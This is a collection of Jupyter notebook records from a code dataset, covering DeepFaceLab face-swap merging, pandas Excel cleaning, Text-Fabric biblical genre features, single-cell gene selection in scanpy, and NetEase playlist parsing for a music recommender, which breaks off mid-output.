workspace/data_src/aligned --training-data-dst-dir workspace/data_dst/aligned --pretraining-data-dir pretrain --model-dir workspace/model --model \"+Model\n\nif Model == \"Quick96\":\n cmd+= \" --pretrained-model-dir pretrain_Q96\"\n\nif Silent_Start:\n cmd+= \" --silent-start\"\n\nif (backup_cmd != \"\"):\n train_cmd = (cmd+backup_cmd)\nelse:\n train_cmd = (cmd)\n\n!python $train_cmd",
"_____no_output_____"
]
],
[
[
"## Merge frames",
"_____no_output_____"
]
],
[
[
"#@title Merge\nModel = \"SAEHD\" #@param [\"SAEHD\", \"AMP\", \"Quick96\" ]\n\ncmd = \"DeepFaceLab/main.py merge --input-dir workspace/data_dst --output-dir workspace/data_dst/merged --output-mask-dir workspace/data_dst/merged_mask --aligned-dir workspace/data_dst/aligned --model-dir workspace/model --model \"+Model\n\n%cd \"/content\"\n!python $cmd",
"_____no_output_____"
],
[
"#@title Get result video \nMode = \"result video\" #@param [\"result video\", \"result_mask video\"]\nCopy_to_Drive = True #@param {type:\"boolean\"}\n\n\nif Mode == \"result video\":\n !python DeepFaceLab/main.py videoed video-from-sequence --input-dir workspace/data_dst/merged --output-file workspace/result.mp4 --reference-file workspace/data_dst.mp4 --include-audio\n if Copy_to_Drive:\n !cp /content/workspace/result.mp4 /content/drive/My\\ Drive/\nelif Mode == \"result_mask video\":\n !python DeepFaceLab/main.py videoed video-from-sequence --input-dir workspace/data_dst/merged_mask --output-file workspace/result_mask.mp4 --reference-file workspace/data_dst.mp4\n if Copy_to_Drive:\n !cp /content/workspace/result_mask.mp4 /content/drive/My\\ Drive/\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2bd4d8c16155175af724aba046731f17d49e5b | 6,347 | ipynb | Jupyter Notebook | pandas_excel.ipynb | PegasusWang/notebooks | 78a88de2ed2e858d3b1f997d0e5155a37e70b82c | [
"MIT"
] | 38 | 2018-02-14T05:40:17.000Z | 2021-09-26T10:14:57.000Z | pandas_excel.ipynb | PegasusWang/notebooks | 78a88de2ed2e858d3b1f997d0e5155a37e70b82c | [
"MIT"
] | null | null | null | pandas_excel.ipynb | PegasusWang/notebooks | 78a88de2ed2e858d3b1f997d0e5155a37e70b82c | [
"MIT"
] | 11 | 2018-02-13T22:52:59.000Z | 2020-07-14T04:04:54.000Z | 27.960352 | 85 | 0.332125 | [
[
[
"# pip install pandas\nimport pandas as pd\ndf = pd.read_excel('stock_data.xlsx') # DataFrame\ndf",
"_____no_output_____"
],
[
"df['revenue'] = df['revenue'].replace(-1, 0)\ndf['price'] = df['price'].replace('n.a.', 0)\ndf['lower_tickers'] = df['tickers'].apply(lambda ticker: ticker.lower())\ndf['double_price'] = df['price'] * 2\ndf",
"_____no_output_____"
],
[
"df.to_excel('new_stock.xlsx')",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
cb2bec79372d1fb07380517e77dbce0fe18ef083 | 77,782 | ipynb | Jupyter Notebook | ranges2tf.ipynb | ETCBC/genre_synvar | 565f675d83e4de1e3c1c69a10bd5c58cd306cf36 | [
"MIT"
] | 1 | 2020-06-16T19:47:48.000Z | 2020-06-16T19:47:48.000Z | ranges2tf.ipynb | ETCBC/genre_synvar | 565f675d83e4de1e3c1c69a10bd5c58cd306cf36 | [
"MIT"
] | 1 | 2020-06-16T19:52:06.000Z | 2020-06-17T13:55:46.000Z | ranges2tf.ipynb | ETCBC/genre_synvar | 565f675d83e4de1e3c1c69a10bd5c58cd306cf36 | [
"MIT"
] | null | null | null | 36.793756 | 9,907 | 0.420419 | [
[
[
"# Convert verse ranges of genres to TF verse node features",
"_____no_output_____"
]
],
[
[
"import collections\nimport pandas as pd\nfrom tf.fabric import Fabric\nfrom tf.compose import modify\nfrom tf.app import use\nA = use('bhsa', hoist=globals())",
"_____no_output_____"
],
[
"genre_ranges = pd.read_csv('genre_ranges.csv')",
"_____no_output_____"
],
[
"genre_ranges",
"_____no_output_____"
]
],
[
[
"# Compile data & sanity checks",
"_____no_output_____"
]
],
[
[
"# check book values\ngenre_ranges.book.unique()",
"_____no_output_____"
],
[
"# check genre values\ngenre_ranges.genre.unique()",
"_____no_output_____"
],
[
"# check book name alignment with BHSA english names\nfor book in genre_ranges.book.unique():\n bhsa_node = T.nodeFromSection((book,))\n if not bhsa_node:\n raise Exception(book)",
"_____no_output_____"
],
[
"def verse_node_range(start, end, tf_api):\n \"\"\"Generate a list of verse nodes for a given range of reference tuples.\n \n Note that start and end are both inclusive bounds.\n \n Args:\n start: 3-tuple of (book, n_ch, n_vs)\n end: 3-tuple of (book, n_ch, n_vs)\n Returns:\n list of nodes\n \"\"\"\n start_node = tf_api.T.nodeFromSection(start)\n end_node = tf_api.T.nodeFromSection(end)\n nodes = [start_node]\n while nodes[-1] < end_node:\n nodes.append(tf_api.L.n(nodes[-1],'verse')[0])\n return nodes",
"_____no_output_____"
],
[
"# check for missing verses\n# or double-counted verses\n\nverse2genre = {} # will be used for TF export\nverse2count = collections.Counter()\n\nfor book, startch, startvs, endch, endvs, genre in genre_ranges.values:\n start = (book, startch, startvs)\n end = (book, endch, endvs)\n for verse in verse_node_range(start, end, A.api):\n verse2genre[verse] = genre\n verse2count[verse] += 1\n \n# check for double-labeled verses\nfor verse,count in verse2count.items():\n if count > 1:\n print(verse, T.sectionFromNode(verse))",
"_____no_output_____"
],
[
"# check for missing verses\nall_verses = set(F.otype.s('verse'))\nfor missing_verse in (all_verses - set(verse2genre.keys())):\n print(missing_verse, T.sectionFromNode(missing_verse))",
"_____no_output_____"
],
[
"#verse2genre",
"_____no_output_____"
]
],
[
[
"# Export TF Features",
"_____no_output_____"
]
],
[
[
"nodeFeatures = {'genre': verse2genre}\nfeatureMeta = {\n 'genre': {\n 'description': '(sub)genre of a verse node',\n 'authors': 'Dirk Bakker, Marianne Kaajan, Martijn Naaijer, Wido van Peursen, Janet Dyk',\n 'origin': 'the genre feature was tagged during the NWO-funded syntactic variation project (2013-2018) of the ETCBC, VU Amsterdam',\n 'source_URL': 'https://github.com/MartijnNaaijer/phdthesis/blob/master/Various/subgenres_synvar.xls',\n 'valueType': 'str',\n } \n}",
"_____no_output_____"
],
[
"TF = Fabric('tf/c')\nTF.save(nodeFeatures=nodeFeatures, metaData=featureMeta)",
"This is Text-Fabric 8.3.2\nApi reference : https://annotation.github.io/text-fabric/cheatsheet.html\n\n1 features found and 0 ignored\n 0.00s Warp feature \"otype\" not found in\ntf/c/\n 0.00s Warp feature \"oslots\" not found in\ntf/c/\n 0.01s Warp feature \"otext\" not found. Working without Text-API\n\n 0.00s Exporting 1 node and 0 edge and 0 config features to tf/c:\n | 0.04s T genre to tf/c\n 0.04s Exported 1 node features and 0 edge features and 0 config features to tf/c\n"
]
],
[
[
"## Tests",
"_____no_output_____"
]
],
[
[
"TF = Fabric(locations=['~/github/etcbc/bhsa/tf/c', 'tf/c'])\nAPI = TF.load('genre')\nAPI.makeAvailableIn(globals())",
"This is Text-Fabric 8.3.2\nApi reference : https://annotation.github.io/text-fabric/cheatsheet.html\n\n115 features found and 0 ignored\n 0.00s loading features ...\n | 0.00s Dataset without structure sections in otext:no structure functions in the T-API\n 4.09s All features loaded/computed - for details use loadLog()\n"
],
[
"F.otype.s('verse')",
"_____no_output_____"
],
[
"verse_data = []\n\nfor verse_n in F.otype.s('verse'):\n genre = F.genre.v(verse_n)\n book, chapter, verse = T.sectionFromNode(verse_n)\n ref = f'{book} {chapter}:{verse}'\n verse_data.append({\n 'node': verse_n,\n 'ref': ref,\n 'book': book,\n 'genre': genre,\n 'text': T.text(verse_n),\n })\n \nverse_df = pd.DataFrame(verse_data)\nverse_df.set_index('node', inplace=True)\nverse_df.head()",
"_____no_output_____"
],
[
"# save a .csv copy\nverse_df[['ref', 'genre']].to_csv('verse2genre.csv', index=False)",
"_____no_output_____"
],
[
"verse_df.genre.value_counts()",
"_____no_output_____"
],
[
"verse_df[verse_df.genre == 'prophetic'].book.value_counts()",
"_____no_output_____"
],
[
"verse_df[verse_df.genre == 'list'].book.value_counts()",
"_____no_output_____"
],
[
"# How many verses per book are a given genre?\n\nbook2genre = pd.pivot_table(\n verse_df,\n index='book',\n columns=['genre'],\n aggfunc='size',\n fill_value=0,\n)\n\nbook2genre",
"_____no_output_____"
],
[
"# get percentages\n\nbook2genre.div(book2genre.sum(1), 0)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2bee4291d3b8afa3bcc49dd56963a94bf8c2bf | 70,182 | ipynb | Jupyter Notebook | notebooks/1_building_and_annotating_the_atlas_core/03_hvg_selection_log_transf.ipynb | LungCellAtlas/HLCA_reproducibility | 4d564ac9f4c5b12421ec6c596169eb8675b08f8b | [
"MIT"
] | null | null | null | notebooks/1_building_and_annotating_the_atlas_core/03_hvg_selection_log_transf.ipynb | LungCellAtlas/HLCA_reproducibility | 4d564ac9f4c5b12421ec6c596169eb8675b08f8b | [
"MIT"
] | null | null | null | notebooks/1_building_and_annotating_the_atlas_core/03_hvg_selection_log_transf.ipynb | LungCellAtlas/HLCA_reproducibility | 4d564ac9f4c5b12421ec6c596169eb8675b08f8b | [
"MIT"
] | null | null | null | 231.623762 | 40,556 | 0.925152 | [
[
[
"## Highly variable gene selection and log-transformation",
"_____no_output_____"
],
[
"In this notebook we select highly variable genes and perform log-transformation of normalized counts for downstream analysis",
"_____no_output_____"
],
[
"#### Import modules:",
"_____no_output_____"
]
],
[
[
"import scanpy as sc\nimport matplotlib.pyplot as plt\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"#### Set paths:",
"_____no_output_____"
]
],
[
[
"path_input_data = \"../../data/HLCA_core_h5ads/HLCA_v1_intermediates/LCA_Bano_Barb_Jain_Kras_Lafy_Meye_Mish_MishBud_Nawi_Seib_Teic_SCRAN_normalized_filt.h5ad\"\npath_output_data = \"../../data/HLCA_core_h5ads/HLCA_v1_intermediates/LCA_Bano_Barb_Jain_Kras_Lafy_Meye_Mish_MishBud_Nawi_Seib_Teic_log1p.h5ad\"",
"_____no_output_____"
]
],
[
[
"#### Perform hvg selection:",
"_____no_output_____"
],
[
"import data:",
"_____no_output_____"
]
],
[
[
"adata = sc.read(path_input_data)",
"_____no_output_____"
]
],
[
[
"select highly variable genes...",
"_____no_output_____"
]
],
[
[
"# function to calculate variances on *sparse* matrix\ndef vars(a, axis=None):\n \"\"\" Variance of sparse matrix a\n var = mean(a**2) - mean(a)**2\n \"\"\"\n a_squared = a.copy()\n a_squared.data **= 2\n return a_squared.mean(axis) - np.square(a.mean(axis))",
"_____no_output_____"
]
],
[
[
"calculate mean, variance, dispersion per gene:",
"_____no_output_____"
]
],
[
[
"means = np.mean(adata.X, axis=0)",
"_____no_output_____"
],
[
"variances = vars(adata.X, axis=0)",
"_____no_output_____"
],
[
"dispersions = variances / means",
"_____no_output_____"
]
],
[
[
"set min_mean cutoff (base this on the plot). We do not want to include the leftmost noisy genes that have high dispersions due to low means.",
"_____no_output_____"
]
],
[
[
"min_mean = 0.06",
"_____no_output_____"
],
[
"# plot mean versus dispersion plot:\n# now plot\nplt.scatter(\n np.log1p(means).tolist()[0], np.log(dispersions).tolist()[0], s=2\n)\nplt.vlines(x=np.log1p(min_mean),ymin=-2,ymax=8,color='red')\nplt.xlabel(\"log1p(mean)\")\nplt.ylabel(\"log(dispersion)\")\nplt.title(\"DISPERSION VERSUS MEAN\")\nplt.show()",
"_____no_output_____"
]
],
[
[
"log-transform data:",
"_____no_output_____"
]
],
[
[
"sc.pp.log1p(adata)",
"_____no_output_____"
]
],
[
[
"now calculate highly variable genes:",
"_____no_output_____"
]
],
[
[
"sc.pp.highly_variable_genes(adata, batch_key=\"dataset\",min_mean=min_mean, flavor=\"cell_ranger\",n_top_genes=2000)",
"/home/icb/lisa.sikkema/miniconda3/envs/scRNAseq_analysis/lib/python3.7/site-packages/pandas/core/indexing.py:671: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n self._setitem_with_indexer(indexer, value)\n"
]
],
[
[
"check selection of genes:",
"_____no_output_____"
]
],
[
[
"boolean_to_color = {\n True: \"crimson\",\n False: \"steelblue\",\n} # make a dictionary that translates the boolean to colors\nhvg_colors = adata.var.highly_variable.map(boolean_to_color) # 'convert' the boolean\n# now plot\nplt.scatter(\n np.log1p(means).tolist()[0], np.log(dispersions).tolist()[0], s=1, c=hvg_colors\n)\nplt.xlabel(\"log1p(mean)\")\nplt.ylabel(\"log(dispersion)\")\nplt.title(\"DISPERSION VERSUS MEAN\")\nplt.show()",
"_____no_output_____"
]
],
[
[
"store",
"_____no_output_____"
]
],
[
[
"adata.write(path_output_data)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2c0f828ba741f5ce9a0a782041d675842be406 | 233,692 | ipynb | Jupyter Notebook | RecommendSystem/RecommendSystem-in-NetEaseMusic.ipynb | Yazooliu/TempCode | e579b8b6eb4657267e9bc9589e47becbbe4ef72b | [
"MIT"
] | null | null | null | RecommendSystem/RecommendSystem-in-NetEaseMusic.ipynb | Yazooliu/TempCode | e579b8b6eb4657267e9bc9589e47becbbe4ef72b | [
"MIT"
] | null | null | null | RecommendSystem/RecommendSystem-in-NetEaseMusic.ipynb | Yazooliu/TempCode | e579b8b6eb4657267e9bc9589e47becbbe4ef72b | [
"MIT"
] | 1 | 2021-12-04T13:33:54.000Z | 2021-12-04T13:33:54.000Z | 37.200255 | 279 | 0.491322 | [
[
[
"#---------\n# Recommend System in NetEase \n# \n# Modify History : 2019 - Jan - 22 \n# Platform: Win7 + Python2 \n#---------",
"_____no_output_____"
]
],
[
[
"### 1 从原始文件中抽取期望的歌单数据",
"_____no_output_____"
]
],
[
[
"#coding:urf-8\nimport json \nimport sys\n\n# 从Json文件中提取特定格式的文本数据 #\n# 返回的文本格式:歌曲名字##歌曲标签##歌单ID##歌曲收藏数目 歌曲信息\ndef parse_song_inline(in_line):\n loaded_data = json.loads(in_line)\n name = loaded_data['result']['name'] # 名字\n tags = \",\".join(loaded_data['result']['tags'])# 标签\n subscribed_count = loaded_data['result']['subscribedCount'] # 收藏数目\n \n if subscribed_count <= 100:\n #print \"subscribed_count is less than 100, please check data ...\"\n return False\n playlist_id = loaded_data['result']['id'] # 歌单ID\n tracks = loaded_data['result']['tracks'] # \"tracks\": [{歌曲1},{歌曲2}, ...]\n \n song_inforcontent = ''\n for track in tracks:\n try: # 歌曲信息中包含: => 歌单ID:::歌曲名字:::歌手名字:::歌曲流行度\n song_inforcontent += \"\\t\" + \":::\".join([str(track['id']),track['name'],track['artists'][0]['name'],str(track['popularity'])])\n except Exception,e:\n print \"Exception information 1\",e\n print track\n continue\n # 获取如下格式的文本信息\n # 格式:歌曲名字##歌曲标签##歌单ID##歌曲收藏数目 歌曲信息\n GotText = name+\"##\"+tags+\"##\"+str(playlist_id)+'##'+str(subscribed_count)+song_inforcontent\n return GotText\n\n# 将抽取的文本写入特定的text文件\ndef parse_files(input_file,out_file):\n outdata = open(out_file,'w')\n for line in open(input_file):\n GotText = parse_song_inline(line)\n if GotText:\n outdata.write(GotText.encode('utf-8').strip()+\"\\n\")\n outdata.close()",
"_____no_output_____"
],
[
"%time parse_files(\"./RawData/playlistdetail.all.json\",\"./InternalData/1_music_playlist_info.txt\")",
"Wall time: 15min 47s\n"
]
],
[
[
"### 2 将歌单数据处理成适用于推荐系统的数据格式",
"_____no_output_____"
]
],
[
[
"import surprise\nimport lightfm\n# project = offline modeleing + oneline prediction \n\n# 推荐机制:\n# 1.针对用户推荐,每日推荐7 - 30首歌曲\n# 2.针对你听到的歌曲,推荐类似的歌曲\n# 3.针对你喜欢的歌手,推荐类似的歌手给用户",
"c:\\python27\\lib\\site-packages\\lightfm\\_lightfm_fast.py:9: UserWarning: LightFM was compiled without OpenMP support. Only a single thread will be used.\n warnings.warn('LightFM was compiled without OpenMP support. '\n"
],
[
"#coding:utf-8 \n#为适应于surprise模型,将数据解析成userid itemid rating timestamp 行格式\nimport json\nimport sys\n\n# check is null or not \ndef is_null(s):\n return len(s.split(\",\"))>2\n\ndef parse_song_inforcontent(song_inforcontent):\n try:\n song_id,name,artist,popularity = song_inforcontent.split(\":::\")\n return \",\".join([song_id,\"1.0\",'1300000'])\n #return \",\".join([song_id, name, artist, popularity])\n except Exception,e:\n #print \"Exception information 2 \",e\n #print song_inforcontent\n return \" \"\n\n\ndef parse_playlist_inline(in_line):\n try:\n contents = in_line.strip().split(\"\\t\") # strip 取出字符串首尾字符,默认是取出空格\n name,tags,playlist_id,subscribed_count = contents[0].split(\"##\")\n songs_infor = map(lambda x: playlist_id +\",\"+ parse_song_inforcontent(x),contents[1:])\n \n # filter (function,iterable): 将iterable 作用于function逐个判断,将满足条件的iterable 返回新list\n songs_information = filter(is_null,songs_infor) \n return \"\\n\".join(songs_information)\n except Exception,e:\n #print \"Exception information 3 \",e\n return False\n\n# 将抽取的文本写入特定的text文件\ndef parse_files(input_file,out_file):\n outdata = open(out_file,'w')\n for line in open(input_file):\n GotText = parse_playlist_inline(line)\n if GotText:\n outdata.write(GotText.encode('utf-8').strip()+\"\\n\")\n outdata.close()",
"_____no_output_____"
],
[
"%time parse_files(\"./InternalData/1_music_playlist_info.txt\",\"./InternalData/2_music_playlist_surpriseformat.txt\")",
"Wall time: 6.52 s\n"
]
],
[
[
"### 处理流行歌单",
"_____no_output_____"
]
],
[
[
"%time parse_files(\"./RawData/popular.playlist\",\"./InternalData/3_music_popularplaylist_surpriseformat.txt\")",
"Wall time: 652 ms\n"
]
],
[
[
"### 3 保存歌曲以及歌单信息以备后面的建模使用",
"_____no_output_____"
],
[
"需要保存歌单ID => 歌单名字,以及歌曲ID =>歌曲名字 的信息以备用",
"_____no_output_____"
]
],
[
[
"#coding:utf-8\nimport cPickle as pickle\nimport sys \ndef parse_playlist_get_infor(in_line,playlist_dic,song_dic):\n contents = in_line.strip().split(\"\\t\")\n name,tags,playlist_id,subscribed_count = contents[0].split(\"##\")\n playlist_dic[playlist_id] = name \n for song in contents[1:]:\n try:\n song_id,song_name,artist,popularity = song.split(\":::\")\n song_dic[song_id] = song_name + \"\\t\" + artist\n except:\n print \"FormatError..\"\n print song + \"\\n\"\n\ndef parse_file(in_file,out_playlist,out_song):\n playlist_dic = {} # 歌单ID 到歌单的映射字典\n song_dic = {} # 歌曲ID到歌曲名字的映射字典\n for line in open(in_file):\n parse_playlist_get_infor(line,playlist_dic,song_dic)\n \n #通过pickle 序列化保存成二进制的文件\n pickle.dump(playlist_dic,open(out_playlist,\"wb\"))\n \n # 通过playlist_doc = pickle.load(open(\"playlist.pkl\",\"rb\")) 重新载入\n pickle.dump(song_dic,open(out_song,\"wb\"))\n ",
"_____no_output_____"
],
[
"%time parse_file(\"./InternalData/1_music_playlist_info.txt\",\"./InternalData/4_playlist.pkl\",\"./InternalData/5_song.pkl\")",
"FormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n4967373:::テニスの王子様::ここからが・・・俺達II\n\nFormatError..\n:::V.A.:::5.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n376653:::野弧禅狂叱(宿香之战)\n\nFormatError..\n:::霹雳英雄:::5.0\n\nFormatError..\n374524:::赎?罪\n\nFormatError..\n赎罪岩:::霹雳英雄:::15.0\n\nFormatError..\n31563610:::\n\nFormatError..\n苍之礼赞:::花之祭P:::65.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n31838468:::Justiφ's(Tv Size Version)\n\nFormatError..\n:::佐藤和豊:::25.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n785061:::幻奏ノ滝\n\nFormatError..\n时音(フォールオブフォール~秋めく滝):::沙紗飛鳥:::65.0\n\nFormatError..\n33190071:::Theme of Blood Blockade Battlefront\n\nFormatError..\n:::岩崎太整:::65.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n33054290:::\n\nFormatError..\nHeartbeats:::Dabin:::90.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n33190071:::Theme of Blood Blockade Battlefront\n\nFormatError..\n:::岩崎太整:::65.0\n\nFormatError..\n33190118:::\n\nFormatError..\nDust:::Toft Willingham:::60.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n424496188:::大王叫我来巡山 - (原唱:\n\nFormatError..\n 贾乃亮/贾云馨):::流浪的蛙蛙:::65.0\n\nFormatError..\n32272105:::\n\nFormatError..\nWonderful Love (DJ Raf Remix):::Money Penny:::95.0\n\nFormatError..\n427142111:::ウタカタ \n\nFormatError..\n(原曲: ミストレイク):::Re:Volte:::25.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n28684643:::勝利 ~Sengoku3 Mix~ [Bonus Track]\n\nFormatError..\n:::光栄BGM部:::80.0\n\nFormatError..\n28684644:::死亡 ~Sengoku3 Mix~ [Bonus Track]\n\nFormatError..\n:::光栄BGM部:::80.0\n\nFormatError..\n22773056:::ODIN SPHERE’s Theme-Shanachie ver.-【エンディング】\n\nFormatError..\n:::崎元仁:::15.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n33497915:::\n\nFormatError..\nFrédéric Chopin: Ballade for piano No. 1 in G minor, Op. 23, CT. 2:::Jorge Bolet:::5.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n29722334:::For You\n\nFormatError..\n:::FiFi Rong:::90.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n405599088:::Make Them Wheels Roll\n\nFormatError..\n:::SAFIA:::100.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n32272104:::\n\nFormatError..\nWonderful Love (Radio Edit):::Money Penny:::80.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n441612015:::不客气\n\nFormatError..\n:::刘世超:::60.0\n\nFormatError..\n441612090:::You're Welcome (Jordan Fisher/Lin-Manuel Miranda Version)\n\nFormatError..\n:::Lin-Manuel Miranda:::35.0\n\nFormatError..\n30474690:::\n\nFormatError..\nLife Of Sin pt.2:::MitiS:::70.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n26249479:::Let's get “あと1センチ\"\n\nFormatError..\n:::AKB48:::20.0\n\nFormatError..\n1342772:::Swan Lake, Op.20 - Act 3 - No.20 Danse hongroise (Czárdás)\n\nFormatError..\nL'Orchestre de la Suisse Romande:::Ernest Ansermet:::5.0\n\nFormatError..\n17742280:::\n\nFormatError..\nJohann Sebastian Bach: Prelude and Fugue in C sharp (WTK, Book, No.3), BWV 848 - Prelude:::Friedrich Gulda:::25.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n26883741:::Concerto For Piano And Orchestra No.2 In E Major, BWV 1053 : \n\nFormatError..\nI. [Allegro]:::Glenn Gould:::20.0\n\nFormatError..\n26883747:::Concerto For Piano And Orchestra No.3 In D Major, BWV 1054 : \n\nFormatError..\nII. Adagio E Piano Sempre:::Glenn Gould:::20.0\n\nFormatError..\n26883754:::Concerto For Piano And Orchestra No.3 In D Major, BWV 1054 : \n\nFormatError..\nIII. Allegro:::Glenn Gould:::20.0\n\nFormatError..\n26883744:::Concerto For Piano And Orchestra No.7 In G Minor, BWV 1058 : \n\nFormatError..\nI. [Allegro]:::Glenn Gould:::20.0\n\nFormatError..\n26883757:::Concerto For Piano And Orchestra No.7 In G Minor, BWV 1058 : \n\nFormatError..\nIII. Allegro Assai:::Glenn Gould:::20.0\n\nFormatError..\n604259:::Sonata for Violin and Piano No. 3 in G minor (1917): I. Allegro vivo \n\nFormatError..\nMidori;Robert McDonald:::五嶋美岛丽:::10.0\n\nFormatError..\n2924300:::\n\nFormatError..\n Les Peulles Mortes (Autum Leaves):::Laura Fygi:::85.0\n\nFormatError..\n28935319:::\n\nFormatError..\nสั่น (Album Version):::Boy Sompob:::100.0\n\nFormatError..\n27511866:::첫 사랑니 (Rum Pum Pum Pum)\n\nFormatError..\n:::f(x):::95.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah Brightman:::100.0\n\nFormatError..\n26884168:::\n\nFormatError..\nAge Of Loneliness (Enigmatic Club Mix):::Enigma:::5.0\n\nFormatError..\n26884170:::\n\nFormatError..\nGravity Of Love (Judgement Day Club Mix):::Enigma:::5.0\n\nFormatError..\n26884172:::\n\nFormatError..\nLight Of Your Smile:::Enigma:::5.0\n\nFormatError..\n26884175:::\n\nFormatError..\nMea Culpa Part Ii (Original Version):::Enigma:::5.0\n\nFormatError..\n26884180:::\n\nFormatError..\nPrinciples Of Lust (Omen Mix):::Enigma:::5.0\n\nFormatError..\n26884182:::\n\nFormatError..\nReturn To Innocence (380 Midnight):::Enigma:::5.0\n\nFormatError..\n26884183:::\n\nFormatError..\nReturn To Innocence (Long):::Enigma:::15.0\n\nFormatError..\n26884186:::\n\nFormatError..\nSadeness Part 1 (Meditation Mix):::Enigma:::5.0\n\nFormatError..\n22642373:::\n\nFormatError..\n FAIRY TAIL メインテーマ -Slow ver.-:::高梨康治:::95.0\n\nFormatError..\n26902203:::What’s your name? (collaboration with 壇蜜)\n\nFormatError..\n:::SoulJa:::100.0\n\nFormatError..\n29011079:::\n\nFormatError..\n真的很抱歉:::棒棒堂:::15.0\n\nFormatError..\n26878881:::\n\nFormatError..\nWolfgang Amadeus Mozart: Serenata notturna in D, K.239 - 2. Menuetto - Trio:::Herbert von Karajan:::5.0\n\nFormatError..\n29011079:::\n\nFormatError..\n真的很抱歉:::棒棒堂:::15.0\n\nFormatError..\n604259:::Sonata for Violin and Piano No. 3 in G minor (1917): I. Allegro vivo \n\nFormatError..\nMidori;Robert McDonald:::五嶋美岛丽:::10.0\n\nFormatError..\n19169096:::\n\nFormatError..\n Time to Say Goodbye (Con te partirò):::Sarah 